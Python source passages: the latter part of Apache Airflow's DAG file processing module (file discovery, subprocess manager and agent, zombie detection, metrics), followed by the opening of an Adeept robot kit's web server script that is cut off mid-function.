:type list(airflow.utils.dag_processing.SimpleDagBag)
"""
self.simple_dags = simple_dags
self.dag_id_to_simple_dag = {}
for simple_dag in simple_dags:
self.dag_id_to_simple_dag[simple_dag.dag_id] = simple_dag
@property
def dag_ids(self):
"""
:return: IDs of all the DAGs in this
:rtype: list[unicode]
"""
return self.dag_id_to_simple_dag.keys()
def get_dag(self, dag_id):
"""
:param dag_id: DAG ID
:type dag_id: unicode
:return: if the given DAG ID exists in the bag, return the BaseDag
corresponding to that ID. Otherwise, throw an Exception
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if dag_id not in self.dag_id_to_simple_dag:
raise AirflowException("Unknown DAG ID {}".format(dag_id))
return self.dag_id_to_simple_dag[dag_id]
def correct_maybe_zipped(fileloc):
"""
If the path contains a folder with a .zip suffix, then
the folder is treated as a zip archive and path to zip is returned.
"""
_, archive, filename = re.search(
r'((.*\.zip){})?(.*)'.format(re.escape(os.sep)), fileloc).groups()
if archive and zipfile.is_zipfile(archive):
return archive
else:
return fileloc
COMMENT_PATTERN = re.compile(r"\s*#.*")
def list_py_file_paths(directory, safe_mode=conf.getboolean('core', 'DAG_DISCOVERY_SAFE_MODE', fallback=True),
include_examples=None):
"""
Traverse a directory and look for Python files.
:param directory: the directory to traverse
:type directory: unicode
:param safe_mode: whether to use a heuristic to determine whether a file
contains Airflow DAG definitions. If not provided, use the
core.DAG_DISCOVERY_SAFE_MODE configuration setting. If not set, default
to safe.
:type safe_mode: bool
:param include_examples: include example DAGs
:type include_examples: bool
:return: a list of paths to Python files in the specified directory
:rtype: list[unicode]
"""
if include_examples is None:
include_examples = conf.getboolean('core', 'LOAD_EXAMPLES')
file_paths = []
if directory is None:
return []
elif os.path.isfile(directory):
return [directory]
elif os.path.isdir(directory):
patterns_by_dir = {}
for root, dirs, files in os.walk(directory, followlinks=True):
patterns = patterns_by_dir.get(root, [])
ignore_file = os.path.join(root, '.airflowignore')
if os.path.isfile(ignore_file):
with open(ignore_file, 'r') as f:
# If we have new patterns create a copy so we don't change
# the previous list (which would affect other subdirs)
lines_no_comments = [COMMENT_PATTERN.sub("", line) for line in f.read().split("\n")]
patterns += [re.compile(line) for line in lines_no_comments if line]
# If we can ignore any subdirs entirely we should - fewer paths
# to walk is better. We have to modify the ``dirs`` array in
# place for this to affect os.walk
dirs[:] = [
d
for d in dirs
if not any(p.search(os.path.join(root, d)) for p in patterns)
]
# We want patterns defined in a parent folder's .airflowignore to
# apply to subdirs too
for d in dirs:
patterns_by_dir[os.path.join(root, d)] = list(patterns)
for f in files:
try:
file_path = os.path.join(root, f)
if not os.path.isfile(file_path):
continue
mod_name, file_ext = os.path.splitext(
os.path.split(file_path)[-1])
if file_ext != '.py' and not zipfile.is_zipfile(file_path):
continue
if any([re.findall(p, file_path) for p in patterns]):
continue
# Heuristic that guesses whether a Python file contains an
# Airflow DAG definition.
might_contain_dag = True
if safe_mode and not zipfile.is_zipfile(file_path):
with open(file_path, 'rb') as fp:
content = fp.read()
might_contain_dag = all(
[s in content for s in (b'DAG', b'airflow')])
if not might_contain_dag:
continue
file_paths.append(file_path)
except Exception:
log = LoggingMixin().log
log.exception("Error while examining %s", f)
if include_examples:
import airflow.example_dags
example_dag_folder = airflow.example_dags.__path__[0]
file_paths.extend(list_py_file_paths(example_dag_folder, safe_mode, False))
return file_paths
class AbstractDagFileProcessor(object):
"""
Processes a DAG file. See SchedulerJob.process_file() for more details.
"""
__metaclass__ = ABCMeta
@abstractmethod
def start(self):
"""
Launch the process to process the file
"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file
"""
raise NotImplementedError()
@property
@abstractmethod
def pid(self):
"""
:return: the PID of the process launched to process the given file
"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self):
"""
A list of simple dags found, and the number of import errors
:return: result of running SchedulerJob.process_file()
:rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self):
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self):
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
DagParsingStat = NamedTuple('DagParsingStat', [
('file_paths', Iterable[str]),
('done', bool),
('all_files_processed', bool)
])
DagFileStat = NamedTuple('DagFileStat', [
('num_dags', int),
('import_errors', int),
('last_finish_time', datetime),
('last_duration', float),
('run_count', int),
])
class DagParsingSignal(enum.Enum):
AGENT_HEARTBEAT = 'agent_heartbeat'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
async_mode):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._async_mode = async_mode
# Map from file path to the processor
self._processors = {}
# Pipe for communicating signals
self._process = None
self._done = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn = None
self._collected_dag_buffer = []
def start(self):
"""
Launch DagFileProcessorManager processor and start DAG parsing loop in manager.
"""
self._parent_signal_conn, child_signal_conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._file_paths,
self._max_runs,
self._processor_factory,
self._processor_timeout,
child_signal_conn,
self._async_mode,
)
)
self._process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_simple_dags calls _heartbeat_manager.
pass
def wait_until_finished(self):
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
return
@staticmethod
def _run_processor_manager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode):
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__CORE__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
reload_module(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
reload_module(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode)
processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
:return: List of parsing result in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._file_paths = stat.file_paths
self._done = stat.done
self._all_files_processed = stat.all_files_processed
@property
def file_paths(self):
return self._file_paths
@property
def done(self):
return self._done
@property
def all_files_processed(self):
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: airflow.models.connection.Connection
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode=True):
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._async_mode = async_mode
self._parallelism = conf.getint('scheduler', 'max_threads')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (max_threads = {}) "
"when using sqlite. So we set parallelism to 1.".format(self._parallelism)
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler',
'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler',
'print_stats_interval')
# How many seconds do we wait for tasks to heartbeat before mark them as zombies.
self._zombie_threshold_secs = (
conf.getint('scheduler', 'scheduler_zombie_task_threshold'))
# Map from file path to the processor
self._processors = {}
self._heartbeat_count = 0
# Map from file path to stats about the file
self._file_stats = {} # type: dict(str, DagFileStat)
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.utcnow()
# Last time stats were printed
self.last_stat_print_time = timezone.datetime(2000, 1, 1)
# TODO: Remove magic number
self._zombie_query_interval = 10
self._zombies = []
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler',
'dag_dir_list_interval')
self._log = logging.getLogger('airflow.processor_manager')
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up DAG file processors to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
# Used to track how long it takes us to get once around every file in the DAG folder.
self._parsing_start_time = timezone.utcnow()
while True:
loop_start_time = time.time()
if self._signal_conn.poll(poll_time):
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
# continue the loop to parse dags
pass
elif not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
continue
self._refresh_dag_dir()
self._find_zombies()
simple_dags = self.heartbeat()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
if not self._async_mode:
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
simple_dags = self.collect_results()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info("Exiting dag parsing loop as all files "
"have been processed %s times", self._max_runs)
break
if self._async_mode:
loop_duration = time.time() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _refresh_dag_dir(self):
"""
Refresh file paths from dag dir if we haven't done it for too long.
"""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
if STORE_SERIALIZED_DAGS:
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.dag import DagModel
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
if conf.getboolean('core', 'store_dag_code', fallback=False):
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(self._file_paths)
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if self.print_stats_interval > 0 and (
timezone.utcnow() -
self.last_stat_print_time).total_seconds() > self.print_stats_interval:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(
~errors.ImportError.filename.in_(self._file_paths)
)
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"# DAGs",
"# Errors",
"Last Runtime",
"Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((now - processor_start_time).total_seconds() if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge('dag_processing.last_run.seconds_ago.{}'.format(file_name), seconds_ago)
if runtime:
Stats.timing('dag_processing.last_duration.{}'.format(file_name), runtime)
# TODO: Remove before Airflow 2.0
Stats.timing('dag_processing.last_runtime.{}'.format(file_name), runtime)
rows.append((file_path,
processor_pid,
runtime,
num_dags,
num_errors,
last_runtime,
last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime) if runtime else None,
num_dags,
num_errors,
"{:.2f}s".format(last_runtime) if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None
))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
@property
def file_paths(self):
return self._file_paths
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for file_path, processor in self._processors.items():
while not processor.done:
time.sleep(0.1)
def collect_results(self):
"""
Collect the result from any finished DAG processors
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
self._kill_timed_out_processors()
finished_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
running_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
for file_path, processor in self._processors.items():
if processor.done:
self.log.debug("Processor for %s finished", file_path)
Stats.decr('dag_processing.processes')
now = timezone.utcnow()
finished_processors[file_path] = processor
stat = DagFileStat(
len(processor.result[0]) if processor.result is not None else 0,
processor.result[1] if processor.result is not None else -1,
now,
(now - processor.start_time).total_seconds(),
self.get_run_count(file_path) + 1,
)
self._file_stats[file_path] = stat
else:
running_processors[file_path] = processor
self._processors = running_processors
self.log.debug("%s/%s DAG parsing processes running",
len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing",
len(self._file_path_queue))
# Collect all the DAGs that were found in the processed files
simple_dags = []
for file_path, processor in finished_processors.items():
if processor.result is None:
self.log.error(
"Processor for %s exited with return code %s.",
processor.file_path, processor.exit_code
)
else:
for simple_dag in processor.result[0]:
simple_dags.append(simple_dag)
return simple_dags
def heartbeat(self):
"""
This should be periodically called by the manager loop. This method will
kick off new processes to process DAG definition files and read the
results from the finished processors.
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
simple_dags = self.collect_results()
# Generate more file paths to process if we processed all the files
# already.
if len(self._file_path_queue) == 0:
self.emit_metrics()
self._parsing_start_time = timezone.utcnow()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (last_finish_time is not None and
(now - last_finish_time).total_seconds() <
self._file_process_interval):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [file_path
for file_path, stat in self._file_stats.items()
if stat.run_count == self._max_runs]
files_paths_to_queue = list(set(self._file_paths) -
set(file_paths_in_progress) -
set(file_paths_recently_processed) -
set(files_paths_at_run_limit))
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path, processor.start_time.isoformat()
)
self.log.debug(
"Queuing the following files for processing:\n\t%s",
"\n\t".join(files_paths_to_queue)
)
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(0, 0, None, None, 0)
self._file_path_queue.extend(files_paths_to_queue)
# Start more processors if we have enough slots and files to process
while (self._parallelism - len(self._processors) > 0 and
len(self._file_path_queue) > 0):
file_path = self._file_path_queue.pop(0)
processor = self._processor_factory(file_path, self._zombies)
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug(
"Started a process (PID: %s) to generate tasks for %s",
processor.pid, file_path
)
self._processors[file_path] = processor
# Update heartbeat count.
self._heartbeat_count += 1
return simple_dags
@provide_session
def _find_zombies(self, session):
"""
Find zombie task instances, which are tasks haven't heartbeated for too long
and update the current zombie list.
"""
now = timezone.utcnow()
zombies = []
if not self._last_zombie_query_time or \
(now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval:
# to avoid circular imports
from airflow.jobs import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
limit_dttm = timezone.utcnow() - timedelta(
seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
tis = (
session.query(TI)
.join(LJ, TI.job_id == LJ.id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
).all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti in tis:
sti = SimpleTaskInstance(ti)
self.log.info(
"Detected zombie job with dag_id %s, task_id %s, and execution date %s",
sti.dag_id, sti.task_id, sti.execution_date.isoformat())
zombies.append(sti)
self._zombies = zombies
def _kill_timed_out_processors(self):
"""
Kill any file processors that timeout to defend against process hangs.
"""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.error(
"Processor for %s with PID %s started at %s has timed out, "
"killing it.",
processor.file_path, processor.pid, processor.start_time.isoformat())
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove ater Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._heartbeat_count < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if len(pids_to_kill) > 0:
# First try SIGTERM
this_process = psutil.Process(os.getpid())
# Only check child processes to ensure that we don't have a case
# where we kill the wrong process because a child process died
# but the PID got reused.
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
for child in child_processes:
self.log.info("Terminating child PID: %s", child.pid)
child.terminate()
# TODO: Remove magic number
timeout = 5
self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
try:
psutil.wait_procs(
child_processes, timeout=timeout,
callback=lambda x: self.log.info('Terminated PID %s', x.pid))
except psutil.TimeoutExpired:
self.log.debug("Ran out of time while waiting for processes to exit")
# Then SIGKILL
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
if len(child_processes) > 0:
self.log.info("SIGKILL processes that did not terminate gracefully")
for child in child_processes:
self.log.info("Killing child PID: %s", child.pid)
child.kill()
child.wait()
def emit_metrics(self):
"""
Emmit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = (timezone.utcnow() - self._parsing_start_time).total_seconds()
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge('dag_processing.import_errors',
sum(stat.import_errors for stat in self._file_stats.values()))
# TODO: Remove before Airflow 2.0
Stats.gauge('collect_dags', parse_time)
Stats.gauge('dagbag_import_errors', sum(stat.import_errors for stat in self._file_stats.values()))
|
webServer.py | #!/usr/bin/env/python3
# File name : server.py
# Production : GWR
# Website : www.adeept.com
# Author : William
# Date : 2020/03/17
import time
import threading
import move
import Adafruit_PCA9685
import os
import info
import RPIservo
import functions
import robotLight
import switch
import socket
#websocket
import asyncio
import websockets
import json
import app
OLED_connection = 1
try:
import OLED
screen = OLED.OLED_ctrl()
screen.start()
screen.screen_show(1, 'ADEEPT.COM')
except:
OLED_connection = 0
print('OLED disconnected')
pass
functionMode = 0
speed_set = 100
rad = 0.5
turnWiggle = 60
scGear = RPIservo.ServoCtrl()
scGear.moveInit()
P_sc = RPIservo.ServoCtrl()
P_sc.start()
T_sc = RPIservo.ServoCtrl()
T_sc.start()
H1_sc = RPIservo.ServoCtrl()
H1_sc.start()
H2_sc = RPIservo.ServoCtrl()
H2_sc.start()
G_sc = RPIservo.ServoCtrl()
G_sc.start()
# modeSelect = 'none'
modeSelect = 'PT'
init_pwm0 = scGear.initPos[0]
init_pwm1 = scGear.initPos[1]
init_pwm2 = scGear.initPos[2]
init_pwm3 = scGear.initPos[3]
init_pwm4 = scGear.initPos[4]
fuc = functions.Functions()
fuc.start()
curpath = os.path.realpath(__file__)
thisPath = "/" + os.path.dirname(curpath)
direction_command = 'no'
turn_command = 'no'
def servoPosInit():
scGear.initConfig(0,init_pwm0,1)
P_sc.initConfig(1,init_pwm1,1)
T_sc.initConfig(2,init_pwm2,1)
H_sc.initConfig(3,init_pwm3,1)
G_sc.initConfig(4,init_pwm4,1)
def replace_num(initial,new_num): #Call this function to replace data in '.txt' file
global r
newline=""
str_num=str(new_num)
with open(thisPath+"/RPIservo.py","r") as f:
for line in f.readlines():
if(line.find(initial) == 0):
line = initial+"%s" %(str_num+"\n")
newline += line
with open(thisPath+"/RPIservo.py","w") as f:
f.writelines(newline)
def FPV_thread():
global fpv
fpv=FPV.FPV()
fpv.capture_thread(addr[0])
def ap_thread():
os.system("sudo create_ap wlan0 eth0 Adeept 12345678")
def functionSelect(command_input, response):
global functionMode
if 'scan' == command_input:
if OLED_connection:
screen.screen_show(5,'SCANNING')
if modeSelect == 'PT':
radar_send = fuc.radarScan()
print(radar_send)
response['title'] = 'scanResult'
response['data'] = radar_send
time.sleep(0.3)
elif 'findColor' == command_input:
if OLED_connection:
screen.screen_show(5,'FindColor')
if modeSelect == 'PT':
